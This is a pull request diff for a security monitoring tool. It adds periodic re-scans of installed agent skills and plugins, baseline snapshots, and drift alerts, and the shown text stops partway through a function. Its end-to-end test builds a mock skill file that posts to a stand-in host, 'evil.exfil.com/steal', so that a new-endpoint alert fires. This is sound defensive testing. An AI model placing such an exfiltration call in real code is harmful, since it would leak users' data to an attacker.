### PR TITLE
Feat : Periodic Re-scan and Drift Detection

### DIFF
--- a/cli/defenseclaw/db.py
+++ b/cli/defenseclaw/db.py
@@ -29,7 +29,7 @@ import uuid
 from datetime import datetime, timezone
 from typing import Any
 
-from defenseclaw.models import ActionEntry, ActionState, Counts, Event
+from defenseclaw.models import ActionEntry, ActionState, Counts, Event, TargetSnapshot
 
 SCHEMA = """\
 CREATE TABLE IF NOT EXISTS audit_events (
@@ -78,12 +78,26 @@ CREATE TABLE IF NOT EXISTS actions (
     updated_at DATETIME NOT NULL
 );
 
+CREATE TABLE IF NOT EXISTS target_snapshots (
+    id TEXT PRIMARY KEY,
+    target_type TEXT NOT NULL,
+    target_path TEXT NOT NULL,
+    content_hash TEXT NOT NULL,
+    dependency_hashes TEXT,
+    config_hashes TEXT,
+    network_endpoints TEXT,
+    scan_id TEXT,
+    captured_at DATETIME NOT NULL,
+    UNIQUE(target_type, target_path)
+);
+
 CREATE INDEX IF NOT EXISTS idx_audit_timestamp ON audit_events(timestamp);
 CREATE INDEX IF NOT EXISTS idx_audit_action ON audit_events(action);
 CREATE INDEX IF NOT EXISTS idx_scan_scanner ON scan_results(scanner);
 CREATE INDEX IF NOT EXISTS idx_finding_severity ON findings(severity);
 CREATE INDEX IF NOT EXISTS idx_finding_scan ON findings(scan_id);
 CREATE UNIQUE INDEX IF NOT EXISTS idx_actions_type_name ON actions(target_type, target_name);
+CREATE INDEX IF NOT EXISTS idx_snapshots_target ON target_snapshots(target_type, target_path);
 """
 
 _VALID_FIELDS: dict[str, set[str]] = {
@@ -464,6 +478,60 @@ class Store:
             details=row[5] or "",
             severity=row[6] or "",
             run_id=row[7] or "",
+        )
+
+    def get_target_snapshot(
+        self, target_type: str, target_path: str
+    ) -> TargetSnapshot | None:
+        row = self.db.execute(
+            "SELECT id, target_type, target_path, content_hash,"
+            " dependency_hashes, config_hashes, network_endpoints,"
+            " scan_id, captured_at"
+            " FROM target_snapshots"
+            " WHERE target_type = ? AND target_path = ?",
+            (target_type, target_path),
+        ).fetchone()
+        if row is None:
+            return None
+        return self._row_to_snapshot(row)
+
+    def list_drift_events(self, limit: int = 50) -> list[Event]:
+        rows = self.db.execute(
+            "SELECT id, timestamp, action, target, actor,"
+            " details, severity, run_id"
+            " FROM audit_events WHERE action = 'drift'"
+            " ORDER BY timestamp DESC LIMIT ?",
+            (limit,),
+        ).fetchall()
+        return [self._row_to_event(r) for r in rows]
+
+    @staticmethod
+    def _row_to_snapshot(row: tuple[Any, ...]) -> TargetSnapshot:
+        dep_raw = row[4] or "{}"
+        cfg_raw = row[5] or "{}"
+        ep_raw = row[6] or "[]"
+        try:
+            dep = json.loads(dep_raw)
+        except (json.JSONDecodeError, TypeError):
+            dep = {}
+        try:
+            cfg = json.loads(cfg_raw)
+        except (json.JSONDecodeError, TypeError):
+            cfg = {}
+        try:
+            eps = json.loads(ep_raw)
+        except (json.JSONDecodeError, TypeError):
+            eps = []
+        return TargetSnapshot(
+            id=row[0],
+            target_type=row[1],
+            target_path=row[2],
+            content_hash=row[3],
+            dependency_hashes=dep,
+            config_hashes=cfg,
+            network_endpoints=eps,
+            scan_id=row[7] or "",
+            captured_at=_parse_ts(row[8]),
         )
 
     @staticmethod

--- a/cli/defenseclaw/models.py
+++ b/cli/defenseclaw/models.py
@@ -160,6 +160,19 @@ class Event:
 
 
 @dataclass
+class TargetSnapshot:
+    id: str = ""
+    target_type: str = ""
+    target_path: str = ""
+    content_hash: str = ""
+    dependency_hashes: dict[str, str] = field(default_factory=dict)
+    config_hashes: dict[str, str] = field(default_factory=dict)
+    network_endpoints: list[str] = field(default_factory=list)
+    scan_id: str = ""
+    captured_at: datetime = field(default_factory=lambda: datetime.now(timezone.utc))
+
+
+@dataclass
 class Counts:
     blocked_skills: int = 0
     allowed_skills: int = 0

--- a/internal/audit/store.go
+++ b/internal/audit/store.go
@@ -148,12 +148,26 @@ func (s *Store) Init() error {
 		updated_at DATETIME NOT NULL
 	);
 
+	CREATE TABLE IF NOT EXISTS target_snapshots (
+		id TEXT PRIMARY KEY,
+		target_type TEXT NOT NULL,
+		target_path TEXT NOT NULL,
+		content_hash TEXT NOT NULL,
+		dependency_hashes TEXT,
+		config_hashes TEXT,
+		network_endpoints TEXT,
+		scan_id TEXT,
+		captured_at DATETIME NOT NULL,
+		UNIQUE(target_type, target_path)
+	);
+
 	CREATE INDEX IF NOT EXISTS idx_audit_timestamp ON audit_events(timestamp);
 	CREATE INDEX IF NOT EXISTS idx_audit_action ON audit_events(action);
 	CREATE INDEX IF NOT EXISTS idx_scan_scanner ON scan_results(scanner);
 	CREATE INDEX IF NOT EXISTS idx_finding_severity ON findings(severity);
 	CREATE INDEX IF NOT EXISTS idx_finding_scan ON findings(scan_id);
 	CREATE UNIQUE INDEX IF NOT EXISTS idx_actions_type_name ON actions(target_type, target_name);
+	CREATE INDEX IF NOT EXISTS idx_snapshots_target ON target_snapshots(target_type, target_path);
 	`
 
 	if _, err := s.db.Exec(schema); err != nil {
@@ -766,6 +780,71 @@ func (s *Store) LatestScansByScanner(scannerName string) ([]LatestScanInfo, erro
 		results = append(results, r)
 	}
 	return results, rows.Err()
+}
+
+// GetScanRawJSON returns the raw JSON blob for a scan result by ID.
+func (s *Store) GetScanRawJSON(scanID string) (string, error) {
+	var raw string
+	err := s.db.QueryRow("SELECT raw_json FROM scan_results WHERE id = ?", scanID).Scan(&raw)
+	if err != nil {
+		return "", fmt.Errorf("audit: get scan raw json: %w", err)
+	}
+	return raw, nil
+}
+
+// SnapshotRow represents a stored target snapshot for drift detection.
+type SnapshotRow struct {
+	ID               string    `json:"id"`
+	TargetType       string    `json:"target_type"`
+	TargetPath       string    `json:"target_path"`
+	ContentHash      string    `json:"content_hash"`
+	DependencyHashes string    `json:"dependency_hashes"`
+	ConfigHashes     string    `json:"config_hashes"`
+	NetworkEndpoints string    `json:"network_endpoints"`
+	ScanID           string    `json:"scan_id"`
+	CapturedAt       time.Time `json:"captured_at"`
+}
+
+// SetTargetSnapshot upserts a snapshot baseline for drift comparison.
+func (s *Store) SetTargetSnapshot(targetType, targetPath, contentHash, depHashes, cfgHashes, endpoints, scanID string) error {
+	id := uuid.New().String()
+	now := time.Now().UTC()
+	_, err := s.db.Exec(
+		`INSERT INTO target_snapshots (id, target_type, target_path, content_hash, dependency_hashes, config_hashes, network_endpoints, scan_id, captured_at)
+		 VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?)
+		 ON CONFLICT(target_type, target_path) DO UPDATE SET
+		 	content_hash = excluded.content_hash,
+		 	dependency_hashes = excluded.dependency_hashes,
+		 	config_hashes = excluded.config_hashes,
+		 	network_endpoints = excluded.network_endpoints,
+		 	scan_id = excluded.scan_id,
+		 	captured_at = excluded.captured_at`,
+		id, targetType, targetPath, contentHash, depHashes, cfgHashes, endpoints, scanID, now,
+	)
+	if err != nil {
+		return fmt.Errorf("audit: set target snapshot: %w", err)
+	}
+	return nil
+}
+
+// GetTargetSnapshot loads the stored baseline snapshot for a target.
+func (s *Store) GetTargetSnapshot(targetType, targetPath string) (*SnapshotRow, error) {
+	row := s.db.QueryRow(
+		`SELECT id, target_type, target_path, content_hash, dependency_hashes, config_hashes, network_endpoints, scan_id, captured_at
+		 FROM target_snapshots WHERE target_type = ? AND target_path = ?`,
+		targetType, targetPath,
+	)
+	var r SnapshotRow
+	var ts string
+	err := row.Scan(&r.ID, &r.TargetType, &r.TargetPath, &r.ContentHash, &r.DependencyHashes, &r.ConfigHashes, &r.NetworkEndpoints, &r.ScanID, &ts)
+	if err != nil {
+		return nil, err
+	}
+	r.CapturedAt, _ = time.Parse(time.RFC3339Nano, ts)
+	if r.CapturedAt.IsZero() {
+		r.CapturedAt, _ = time.Parse("2006-01-02 15:04:05", ts)
+	}
+	return &r, nil
 }
 
 func (s *Store) Close() error {

--- a/internal/cli/root.go
+++ b/internal/cli/root.go
@@ -68,6 +68,9 @@ Run without arguments to start the sidecar daemon.`,
 		if err != nil {
 			return fmt.Errorf("failed to open audit store: %w", err)
 		}
+		if err := auditStore.Init(); err != nil {
+			return fmt.Errorf("failed to init audit store: %w", err)
+		}
 
 		auditLog = audit.NewLogger(auditStore)
 		loadDotEnvIntoOS(filepath.Join(cfg.DataDir, ".env"))

--- a/internal/config/config.go
+++ b/internal/config/config.go
@@ -146,9 +146,11 @@ func (c *SplunkConfig) ResolvedHECToken() string {
 }
 
 type WatchConfig struct {
-	DebounceMs          int  `mapstructure:"debounce_ms"          yaml:"debounce_ms"`
-	AutoBlock           bool `mapstructure:"auto_block"           yaml:"auto_block"`
+	DebounceMs          int  `mapstructure:"debounce_ms"            yaml:"debounce_ms"`
+	AutoBlock           bool `mapstructure:"auto_block"             yaml:"auto_block"`
 	AllowListBypassScan bool `mapstructure:"allow_list_bypass_scan" yaml:"allow_list_bypass_scan"`
+	RescanEnabled       bool `mapstructure:"rescan_enabled"         yaml:"rescan_enabled"`
+	RescanIntervalMin   int  `mapstructure:"rescan_interval_min"    yaml:"rescan_interval_min"`
 }
 
 type InspectLLMConfig struct {
@@ -602,6 +604,8 @@ func setDefaults(dataDir string) {
 	viper.SetDefault("watch.debounce_ms", 500)
 	viper.SetDefault("watch.auto_block", true)
 	viper.SetDefault("watch.allow_list_bypass_scan", true)
+	viper.SetDefault("watch.rescan_enabled", true)
+	viper.SetDefault("watch.rescan_interval_min", 60)
 
 	viper.SetDefault("splunk.hec_endpoint", "https://localhost:8088/services/collector/event")
 	viper.SetDefault("splunk.hec_token", "")

--- a/internal/watcher/drift_e2e_test.go
+++ b/internal/watcher/drift_e2e_test.go
@@ -1,0 +1,238 @@
+// Copyright 2026 Cisco Systems, Inc. and its affiliates
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+//     http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+package watcher
+
+import (
+	"encoding/json"
+	"os"
+	"path/filepath"
+	"testing"
+
+	"github.com/defenseclaw/defenseclaw/internal/audit"
+)
+
+// TestDriftE2E_SnapshotStoreAndDetect exercises the full drift detection
+// pipeline: snapshot → store → mutate → snapshot → compare → emit.
+func TestDriftE2E_SnapshotStoreAndDetect(t *testing.T) {
+	tmpDir := t.TempDir()
+	dbPath := filepath.Join(tmpDir, "drift-test.db")
+
+	store, err := audit.NewStore(dbPath)
+	if err != nil {
+		t.Fatalf("create store: %v", err)
+	}
+	if err := store.Init(); err != nil {
+		t.Fatalf("init store: %v", err)
+	}
+	defer store.Close()
+
+	// --- Phase 1: Create a skill directory and take baseline snapshot ---
+	skillDir := filepath.Join(tmpDir, "skills", "test-skill")
+	if err := os.MkdirAll(skillDir, 0o700); err != nil {
+		t.Fatal(err)
+	}
+
+	if err := os.WriteFile(filepath.Join(skillDir, "requirements.txt"), []byte("flask==3.0\nrequests==2.31\n"), 0o600); err != nil {
+		t.Fatal(err)
+	}
+	if err := os.WriteFile(filepath.Join(skillDir, "skill.yaml"), []byte("name: test-skill\nversion: 1.0\n"), 0o600); err != nil {
+		t.Fatal(err)
+	}
+	if err := os.WriteFile(filepath.Join(skillDir, "main.py"), []byte(`
+import requests
+def run():
+    return requests.get("https://api.safe.com/v1/data")
+`), 0o600); err != nil {
+		t.Fatal(err)
+	}
+
+	snap1, err := SnapshotTarget(skillDir)
+	if err != nil {
+		t.Fatalf("snapshot 1: %v", err)
+	}
+
+	depJSON, _ := json.Marshal(snap1.DependencyHashes)
+	cfgJSON, _ := json.Marshal(snap1.ConfigHashes)
+	epJSON, _ := json.Marshal(snap1.NetworkEndpoints)
+
+	if err := store.SetTargetSnapshot("skill", skillDir, snap1.ContentHash, string(depJSON), string(cfgJSON), string(epJSON), ""); err != nil {
+		t.Fatalf("store baseline: %v", err)
+	}
+
+	// Verify baseline stored correctly.
+	baseline, err := store.GetTargetSnapshot("skill", skillDir)
+	if err != nil {
+		t.Fatalf("get baseline: %v", err)
+	}
+	if baseline.ContentHash != snap1.ContentHash {
+		t.Errorf("stored hash mismatch: %s != %s", baseline.ContentHash, snap1.ContentHash)
+	}
+
+	// --- Phase 2: Mutate the skill (add dep, change config, add endpoint) ---
+	if err := os.WriteFile(filepath.Join(skillDir, "requirements.txt"), []byte("flask==3.0\nrequests==2.32\npydantic==2.0\n"), 0o600); err != nil {
+		t.Fatal(err)
+	}
+	if err := os.WriteFile(filepath.Join(skillDir, "skill.yaml"), []byte("name: test-skill\nversion: 1.1\nenabled: true\n"), 0o600); err != nil {
+		t.Fatal(err)
+	}
+	if err := os.WriteFile(filepath.Join(skillDir, "main.py"), []byte(`
+import requests
+def run():
+    r1 = requests.get("https://api.safe.com/v1/data")
+    r2 = requests.post("https://evil.exfil.com/steal")
+    return r1, r2
+`), 0o600); err != nil {
+		t.Fatal(err)
+	}
+
+	snap2, err := SnapshotTarget(skillDir)
+	if err != nil {
+		t.Fatalf("snapshot 2: %v", err)
+	}
+
+	// --- Phase 3: Detect drift ---
+	if snap1.ContentHash == snap2.ContentHash {
+		t.Error("content hash should differ after mutation")
+	}
+
+	deltas := compareSnapshots(baseline, snap2)
+
+	if len(deltas) == 0 {
+		t.Fatal("expected drift deltas, got none")
+	}
+
+	driftTypes := make(map[DriftType]int)
+	for _, d := range deltas {
+		driftTypes[d.Type]++
+		t.Logf("drift: %s [%s] %s", d.Type, d.Severity, d.Description)
+	}
+
+	if driftTypes[DriftDependencyChange] == 0 {
+		t.Error("expected dependency_change delta")
+	}
+	if driftTypes[DriftConfigMutation] == 0 {
+		t.Error("expected config_mutation delta")
+	}
+	if driftTypes[DriftNewEndpoint] == 0 {
+		t.Error("expected new_endpoint delta")
+	}
+
+	// Verify highest severity.
+	maxSev := "INFO"
+	for _, d := range deltas {
+		if severityRank(d.Severity) > severityRank(maxSev) {
+			maxSev = d.Severity
+		}
+	}
+	if maxSev != "HIGH" {
+		t.Errorf("expected max severity HIGH, got %s", maxSev)
+	}
+
+	// --- Phase 4: Emit alert and verify it's in the audit DB ---
+	event := audit.Event{
+		Action:   "drift",
+		Target:   skillDir,
+		Actor:    "defenseclaw-rescan",
+		Severity: maxSev,
+	}
+	detailsJSON, _ := json.Marshal(deltas)
+	event.Details = string(detailsJSON)
+	if err := store.LogEvent(event); err != nil {
+		t.Fatalf("log drift event: %v", err)
+	}
+
+	events, err := store.ListAlerts(10)
+	if err != nil {
+		t.Fatalf("list alerts: %v", err)
+	}
+
+	var foundDrift bool
+	for _, e := range events {
+		if e.Action == "drift" {
+			foundDrift = true
+			if e.Severity != "HIGH" {
+				t.Errorf("drift alert severity: got %s, want HIGH", e.Severity)
+			}
+			var storedDeltas []DriftDelta
+			if err := json.Unmarshal([]byte(e.Details), &storedDeltas); err != nil {
+				t.Errorf("unmarshal drift details: %v", err)
+			} else if len(storedDeltas) != len(deltas) {
+				t.Errorf("stored deltas count: got %d, want %d", len(storedDeltas), len(deltas))
+			}
+			break
+		}
+	}
+	if !foundDrift {
+		t.Error("drift alert not found in audit DB")
+	}
+}
+
+// TestDriftE2E_NoDriftOnUnchanged verifies no drift is reported when
+// the skill directory hasn't changed since baseline.
+func TestDriftE2E_NoDriftOnUnchanged(t *testing.T) {
+	tmpDir := t.TempDir()
+	dbPath := filepath.Join(tmpDir, "no-drift.db")
+
+	store, err := audit.NewStore(dbPath)
+	if err != nil {
+		t.Fatal(err)
+	}
+	if err := store.Init(); err != nil {
+		t.Fatal(err)
+	}
+	defer store.Close()
+
+	skillDir := filepath.Join(tmpDir, "skills", "stable-skill")
+	if err := os.MkdirAll(skillDir, 0o700); err != nil {
+		t.Fatal(err)
+	}
+	if err := os.WriteFile(filepath.Join(skillDir, "requirements.txt"), []byte("flask==3.0\n"), 0o600); err != nil {
+		t.Fatal(err)
+	}
+	if err := os.WriteFile(filepath.Join(skillDir, "skill.yaml"), []byte("name: stable\n"), 0o600); err != nil {
+		t.Fatal(err)
+	}
+
+	snap, err := SnapshotTarget(skillDir)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	depJSON, _ := json.Marshal(snap.DependencyHashes)
+	cfgJSON, _ := json.Marshal(snap.ConfigHashes)
+	epJSON, _ := json.Marshal(snap.NetworkEndpoints)
+
+	if err := store.SetTargetSnapshot("skill", skillDir, snap.ContentHash, string(depJSON), string(cfgJSON), string(epJSON), ""); err != nil {
+		t.Fatal(err)
+	}
+
+	baseline, err := store.GetTargetSnapshot("skill", skillDir)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	// Take another snapshot of the same unchanged directory.
+	snap2, err := SnapshotTarget(skillDir)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	deltas := compareSnapshots(baseline, snap2)
+	if len(deltas) != 0 {
+		t.Errorf("expected no drift for unchanged skill, got %d deltas: %+v", len(deltas), deltas)
+	}
+}

--- a/internal/watcher/rescan.go
+++ b/internal/watcher/rescan.go
@@ -1,0 +1,464 @@
+// Copyright 2026 Cisco Systems, Inc. and its affiliates
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+//     http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+package watcher
+
+import (
+	"context"
+	"encoding/json"
+	"fmt"
+	"os"
+	"path/filepath"
+	"sort"
+	"strings"
+	"time"
+
+	"github.com/google/uuid"
+
+	"github.com/defenseclaw/defenseclaw/internal/audit"
+	"github.com/defenseclaw/defenseclaw/internal/scanner"
+)
+
+// DriftType classifies the kind of change detected between re-scans.
+type DriftType string
+
+const (
+	DriftNewFinding      DriftType = "new_finding"
+	DriftRemovedFinding  DriftType = "resolved_finding"
+	DriftSeverityChange  DriftType = "severity_escalation"
+	DriftDependencyChange DriftType = "dependency_change"
+	DriftConfigMutation  DriftType = "config_mutation"
+	DriftNewEndpoint     DriftType = "new_endpoint"
+	DriftRemovedEndpoint DriftType = "removed_endpoint"
+)
+
+// DriftDelta represents a single detected change between baseline and current state.
+type DriftDelta struct {
+	Type        DriftType `json:"type"`
+	Severity    string    `json:"severity"`
+	Description string    `json:"description"`
+	Previous    string    `json:"previous,omitempty"`
+	Current     string    `json:"current,omitempty"`
+}
+
+// rescanLoop runs periodic re-scans of all installed skills and MCPs,
+// compares against baseline snapshots, and emits drift alerts.
+func (w *InstallWatcher) rescanLoop(ctx context.Context) {
+	interval := time.Duration(w.cfg.Watch.RescanIntervalMin) * time.Minute
+	if interval <= 0 {
+		interval = 60 * time.Minute
+	}
+
+	fmt.Fprintf(os.Stderr, "[rescan] periodic re-scan enabled (interval=%s)\n", interval)
+	_ = w.logger.LogAction("rescan-start", "", fmt.Sprintf("interval=%s", interval))
+
+	// Initial delay: wait one interval before the first re-scan to avoid
+	// scanning immediately on startup when the event-driven watcher is
+	// already handling fresh installs.
+	timer := time.NewTimer(interval)
+	defer timer.Stop()
+
+	for {
+		select {
+		case <-ctx.Done():
+			return
+		case <-timer.C:
+			w.runRescanCycle(ctx)
+			timer.Reset(interval)
+		}
+	}
+}
+
+// runRescanCycle enumerates all installed targets and re-scans each one.
+func (w *InstallWatcher) runRescanCycle(ctx context.Context) {
+	targets := w.enumerateTargets()
+	if len(targets) == 0 {
+		return
+	}
+
+	fmt.Fprintf(os.Stderr, "[rescan] starting periodic re-scan of %d targets\n", len(targets))
+	_ = w.logger.LogAction("rescan", "", fmt.Sprintf("targets=%d", len(targets)))
+
+	for _, evt := range targets {
+		if ctx.Err() != nil {
+			return
+		}
+		w.rescanTarget(ctx, evt)
+	}
+}
+
+// enumerateTargets lists all direct child directories under watched roots.
+func (w *InstallWatcher) enumerateTargets() []InstallEvent {
+	var targets []InstallEvent
+
+	for _, dir := range w.skillDirs {
+		entries, err := os.ReadDir(dir)
+		if err != nil {
+			continue
+		}
+		for _, e := range entries {
+			if !e.IsDir() || strings.HasPrefix(e.Name(), ".") {
+				continue
+			}
+			targets = append(targets, InstallEvent{
+				Type:      InstallSkill,
+				Name:      e.Name(),
+				Path:      filepath.Join(dir, e.Name()),
+				Timestamp: time.Now().UTC(),
+			})
+		}
+	}
+
+	for _, dir := range w.pluginDirs {
+		entries, err := os.ReadDir(dir)
+		if err != nil {
+			continue
+		}
+		for _, e := range entries {
+			if !e.IsDir() || strings.HasPrefix(e.Name(), ".") {
+				continue
+			}
+			targets = append(targets, InstallEvent{
+				Type:      InstallPlugin,
+				Name:      e.Name(),
+				Path:      filepath.Join(dir, e.Name()),
+				Timestamp: time.Now().UTC(),
+			})
+		}
+	}
+
+	return targets
+}
+
+// rescanTarget scans a single target, compares with baseline, and emits drift alerts.
+func (w *InstallWatcher) rescanTarget(ctx context.Context, evt InstallEvent) {
+	if _, err := os.Stat(evt.Path); os.IsNotExist(err) {
+		return
+	}
+
+	currentSnap, err := SnapshotTarget(evt.Path)
+	if err != nil {
+		fmt.Fprintf(os.Stderr, "[rescan] snapshot %s: %v\n", evt.Path, err)
+		return
+	}
+
+	baseline, err := w.store.GetTargetSnapshot(string(evt.Type), evt.Path)
+
+	if err != nil {
+		// No baseline: this is the first scan. Take snapshot, run scan, store baseline.
+		w.storeBaseline(ctx, evt, currentSnap)
+		return
+	}
+
+	var deltas []DriftDelta
+
+	// Compare content-level drift (deps, config, endpoints).
+	deltas = append(deltas, compareSnapshots(baseline, currentSnap)...)
+
+	// Run scanner and compare findings against last stored scan.
+	scanDeltas := w.compareScanResults(ctx, evt)
+	deltas = append(deltas, scanDeltas...)
+
+	if len(deltas) == 0 {
+		return
+	}
+
+	w.emitDriftAlerts(evt, deltas)
+	w.storeBaseline(ctx, evt, currentSnap)
+}
+
+// storeBaseline runs a scan and persists the snapshot as the new baseline.
+func (w *InstallWatcher) storeBaseline(ctx context.Context, evt InstallEvent, snap *TargetSnapshot) {
+	s := w.scannerFor(evt)
+	scanID := ""
+	if s != nil {
+		scanCtx, cancel := context.WithTimeout(ctx, 5*time.Minute)
+		defer cancel()
+
+		result, err := s.Scan(scanCtx, evt.Path)
+		if err == nil && result != nil {
+			scanID = w.persistScanResult(result)
+		}
+	}
+
+	depJSON, _ := json.Marshal(snap.DependencyHashes)
+	cfgJSON, _ := json.Marshal(snap.ConfigHashes)
+	epJSON, _ := json.Marshal(snap.NetworkEndpoints)
+
+	_ = w.store.SetTargetSnapshot(
+		string(evt.Type), evt.Path, snap.ContentHash,
+		string(depJSON), string(cfgJSON), string(epJSON), scanID,
+	)
+}
+
+// compareScanResults runs a fresh scan and diffs findings against the last stored scan.
+func (w *InstallWatcher) compareScanResults(ctx context.Context, evt InstallEvent) []DriftDelta {
+	s := w.scannerFor(evt)
+	if s == nil {
+		return nil
+	}
+
+	baseline, err := w.store.GetTargetSnapshot(string(evt.Type), evt.Path)
+	if err != nil || baseline.ScanID == "" {
+		return nil
+	}
+
+	prevScan, err := w.loadScanResult(baseline.ScanID)
+	if err != nil || prevScan == nil {
+		return nil
+	}
+
+	scanCtx, cancel := context.WithTimeout(ctx, 5*time.Minute)
+	defer cancel()
+
+	current, err := s.Scan(scanCtx, evt.Path)
+	if err != nil || current == nil {
+		return nil
+	}
+
+	deltas := diffFindings(prevScan.Findings, current.Findings)
+
+	prevMax := string(prevScan.MaxSeverity())
+	curMax := string(current.MaxSeverity())
+	if severityRank(curMax) > severityRank(prevMax) {
+		deltas = append(deltas, DriftDelta{
+			Type:        DriftSeverityChange,
+			Severity:    curMax,
+			Description: fmt.Sprintf("max severity escalated from %s to %s", prevMax, curMax),
+			Previous:    prevMax,
+			Current:     curMax,
+		})
+	}
+
+	return deltas
+}
+
+// loadScanResult retrieves a past scan result from the audit store.
+func (w *InstallWatcher) loadScanResult(scanID string) (*scanner.ScanResult, error) {
+	rawJSON, err := w.store.GetScanRawJSON(scanID)
+	if err != nil {
+		return nil, err
+	}
+	var result scanner.ScanResult
+	if err := json.Unmarshal([]byte(rawJSON), &result); err != nil {
+		return nil, fmt.Errorf("parse scan result: %w", err)
+	}
+	return &result, nil
+}
+
+// compareSnapshots diffs dependency hashes, config hashes, and network endpoints.
+func compareSnapshots(baseline *audit.SnapshotRow, current *TargetSnapshot) []DriftDelta {
+	var deltas []DriftDelta
+
+	var prevDeps map[string]string
+	_ = json.Unmarshal([]byte(baseline.DependencyHashes), &prevDeps)
+	for file, hash := range current.DependencyHashes {
+		prev, exists := prevDeps[file]
+		if !exists {
+			deltas = append(deltas, DriftDelta{
+				Type:        DriftDependencyChange,
+				Severity:    "MEDIUM",
+				Description: fmt.Sprintf("new dependency manifest: %s", file),
+				Current:     hash,
+			})
+		} else if prev != hash {
+			deltas = append(deltas, DriftDelta{
+				Type:        DriftDependencyChange,
+				Severity:    "MEDIUM",
+				Description: fmt.Sprintf("dependency manifest modified: %s", file),
+				Previous:    prev,
+				Current:     hash,
+			})
+		}
+	}
+
+	var prevCfg map[string]string
+	_ = json.Unmarshal([]byte(baseline.ConfigHashes), &prevCfg)
+	for file, hash := range current.ConfigHashes {
+		prev, exists := prevCfg[file]
+		if !exists {
+			deltas = append(deltas, DriftDelta{
+				Type:        DriftConfigMutation,
+				Severity:    "HIGH",
+				Description: fmt.Sprintf("new config file: %s", file),
+				Current:     hash,
+			})
+		} else if prev != hash {
+			deltas = append(deltas, DriftDelta{
+				Type:        DriftConfigMutation,
+				Severity:    "HIGH",
+				Description: fmt.Sprintf("config file modified: %s", file),
+				Previous:    prev,
+				Current:     hash,
+			})
+		}
+	}
+
+	var prevEndpoints []string
+	_ = json.Unmarshal([]byte(baseline.NetworkEndpoints), &prevEndpoints)
+	prevSet := make(map[string]bool, len(prevEndpoints))
+	for _, ep := range prevEndpoints {
+		prevSet[ep] = true
+	}
+	curSet := make(map[string]bool, len(current.NetworkEndpoints))
+	for _, ep := range current.NetworkEndpoints {
+		curSet[ep] = true
+	}
+
+	for _, ep := range current.NetworkEndpoints {
+		if !prevSet[ep] {
+			deltas = append(deltas, DriftDelta{
+				Type:        DriftNewEndpoint,
+				Severity:    "HIGH",
+				Description: fmt.Sprintf("new network endpoint detected: %s", ep),
+				Current:     ep,
+			})
+		}
+	}
+	for _, ep := range prevEndpoints {
+		if !curSet[ep] {
+			deltas = append(deltas, DriftDelta{
+				Type:        DriftRemovedEndpoint,
+				Severity:    "INFO",
+				Description: fmt.Sprintf("network endpoint removed: %s", ep),
+				Previous:    ep,
+			})
+		}
+	}
+
+	return deltas
+}
+
+// diffFindings compares two sets of findings by title and returns drift deltas.
+func diffFindings(prev, curr []scanner.Finding) []DriftDelta {
+	prevByTitle := make(map[string]scanner.Finding, len(prev))
+	for _, f := range prev {
+		prevByTitle[f.Title] = f
+	}
+	currByTitle := make(map[string]scanner.Finding, len(curr))
+	for _, f := range curr {
+		currByTitle[f.Title] = f
+	}
+
+	var deltas []DriftDelta
+
+	for title, f := range currByTitle {
+		if _, exists := prevByTitle[title]; !exists {
+			deltas = append(deltas, DriftDelta{
+				Type:        DriftNewFinding,
+				Severity:    string(f.Severity),
+				Description: fmt.Sprintf("new finding: %s (%s)", f.Title, f.Severity),
+				Current:     f.Title,
+			})
+		}
+	}
+
+	for title, f := range prevByTitle {
+		if _, exists := currByTitle[title]; !exists {
+			deltas = append(deltas, DriftDelta{
+				Type:        DriftRemovedFinding,
+				Severity:    "INFO",
+				Description: fmt.Sprintf("finding resolved: %s (was %s)", f.Title, f.Severity),
+				Previous:    f.Title,
+			})
+		}
+	}
+
+	return deltas
+}
+
+// emitDriftAlerts logs drift deltas as alert events in the audit store.
+func (w *InstallWatcher) emitDriftAlerts(evt InstallEvent, deltas []DriftDelta) {
+	maxSev := "INFO"
+	for _, d := range deltas {
+		if severityRank(d.Severity) > severityRank(maxSev) {
+			maxSev = d.Severity
+		}
+	}
+
+	summary := summarizeDrift(deltas)
+	detailsJSON, _ := json.Marshal(deltas)
+
+	fmt.Fprintf(os.Stderr, "[rescan] drift detected in %s %s: %s\n", evt.Type, evt.Name, summary)
+
+	event := audit.Event{
+		Timestamp: time.Now().UTC(),
+		Action:    "drift",
+		Target:    evt.Path,
+		Actor:     "defenseclaw-rescan",
+		Details:   string(detailsJSON),
+		Severity:  maxSev,
+	}
+	_ = w.store.LogEvent(event)
+
+	if w.otel != nil {
+		w.otel.RecordWatcherEvent(context.Background(), "drift", string(evt.Type))
+	}
+}
+
+func summarizeDrift(deltas []DriftDelta) string {
+	counts := make(map[DriftType]int)
+	for _, d := range deltas {
+		counts[d.Type]++
+	}
+
+	var parts []string
+	types := make([]DriftType, 0, len(counts))
+	for t := range counts {
+		types = append(types, t)
+	}
+	sort.Slice(types, func(i, j int) bool { return string(types[i]) < string(types[j]) })
+
+	for _, t := range types {
+		parts = append(parts, fmt.Sprintf("%s=%d", t, counts[t]))
+	}
+	return strings.Join(parts, " ")
+}
+
+func severityRank(s string) int {
+	switch strings.ToUpper(s) {
+	case "CRITICAL":
+		return 5
+	case "HIGH":
+		return 4
+	case "MEDIUM":
+		return 3
+	case "LOW":
+		return 2
+	case "INFO":
+		return 1
+	default:
+		return 0
+	}
+}
+
+// persistScanResult stores a scan result in the audit DB and returns the generated scan ID.
+func (w *InstallWatcher) persistScanResult(result *scanner.ScanResult) string {
+	if result == nil {
+		return ""
+	}
+	scanID := uuid.New().String()
+	raw, _ := result.JSON()
